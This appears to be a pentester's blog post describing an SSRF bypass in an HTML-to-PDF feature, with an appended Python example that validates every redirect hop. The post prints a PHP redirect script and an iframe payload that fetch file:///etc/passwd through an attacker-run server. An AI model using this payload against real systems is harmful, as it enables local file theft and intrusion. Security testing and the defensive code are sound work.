# Week 48 - SSRF Bypass

If you are looking for a last-minute stocking stuffer, how about a tip on Server-Side Request Forgery Bypass? All kids seem to love those.

Anyway, I was on an [#AppSec](https://www.linkedin.com/feed/hashtag/?keywords=appsec\&highlightedUpdateUrns=urn%3Ali%3Aactivity%3A7011697154809282560) engagement recently and was doing research on bypassing [#SSRF](https://www.linkedin.com/feed/hashtag/?keywords=ssrf\&highlightedUpdateUrns=urn%3Ali%3Aactivity%3A7011697154809282560) restrictions. Turns out, I found a super cool technique I wanted to share with y’all. To summarize:

The application I was pentesting had an HTML to PDF feature that allowed me to inject my own iframes. I tried to point to localhost, /etc/passwd, and the AWS metadata server with no luck. I started researching SSRF bypasses and found that if I added the below code into a PHP file named ‘jakey.php’ on my own web server:

```php
<?php
// Redirect the requesting client to whatever URL is passed in the 'a' GET parameter.
$loc = $_GET['a'];
header('Location: ' . $loc);
?>
```

And then pointed to it with an iframe:

`<iframe src='http[:]//<my-server>/jakey.php?a=file[:]///etc/passwd'/>`

I could finally retrieve local files! This works because the HTML to PDF feature first loads \<my-server>/jakey.php with no issues since it is not blacklisted. Then, upon being loaded, jakey.php redirects the server to the address specified in the ‘a’ GET parameter, which in this case was file\[:]///etc/passwd.

And then boom! I had local file read. Pretty cool technique for SSRF testing.

![](/files/JYrWMa7a8wlvBj6TtKt9)
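
The server-side fix for the redirect behaviour described above, as an added example that is not part of the original post: the fetcher follows redirects by hand and re-validates every hop, so a `Location:` header pointing at `file://` or at an internal address is rejected even though the first URL passed the filter. It generalizes from the `file://` case to internal hosts such as localhost; the function names, host names, and the fake DNS/HTTP tables are hypothetical and constructed so the code runs offline.

```python
import ipaddress
from urllib.parse import urlsplit, urljoin

MAX_REDIRECTS = 5

def check_url(url, resolve):
    """Return a block reason for url, or None if it may be fetched."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ("http", "https"):
        return f"scheme {parts.scheme!r} not allowed"   # stops file:// and friends
    host = parts.hostname
    if not host:
        return "missing host"
    try:
        addrs = [ipaddress.ip_address(host)]            # IP literal in the URL
    except ValueError:
        addrs = [ipaddress.ip_address(a) for a in resolve(host)]
    if not addrs:
        return f"{host} does not resolve"
    for ip in addrs:
        if not ip.is_global:                            # loopback, RFC 1918, link-local
            return f"{host} maps to non-public address {ip}"
    return None

def fetch_checked(url, fetch_once, resolve):
    """Follow redirects by hand so every hop is validated, not only the first URL.
    fetch_once(url) -> (status, location, body) must not follow redirects itself."""
    for _ in range(MAX_REDIRECTS + 1):
        reason = check_url(url, resolve)
        if reason:
            raise ValueError(f"blocked {url}: {reason}")
        status, location, body = fetch_once(url)
        if status not in (301, 302, 303, 307, 308) or not location:
            return body
        url = urljoin(url, location)                    # next hop gets checked too
    raise ValueError("too many redirects")

# Constructed stand-ins for DNS and HTTP (assumed names and addresses).
BASE = "http://my-server.example/jakey.php?a="
FAKE_DNS = {"my-server.example": ["93.184.216.34"], "cdn.example": ["93.184.216.35"]}
FAKE_WEB = {
    BASE + "file:///etc/passwd": (302, "file:///etc/passwd", ""),
    BASE + "http://127.0.0.1/": (302, "http://127.0.0.1/", ""),
    BASE + "http://cdn.example/logo.png": (302, "http://cdn.example/logo.png", ""),
    "http://cdn.example/logo.png": (200, None, "image-bytes"),
}
def fake_resolve(host): return FAKE_DNS.get(host, [])
def fake_fetch(url): return FAKE_WEB[url]
```

In a real renderer the connection should also be pinned to the address that was validated, otherwise a second DNS lookup at fetch time can return a different answer than the one that was checked.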

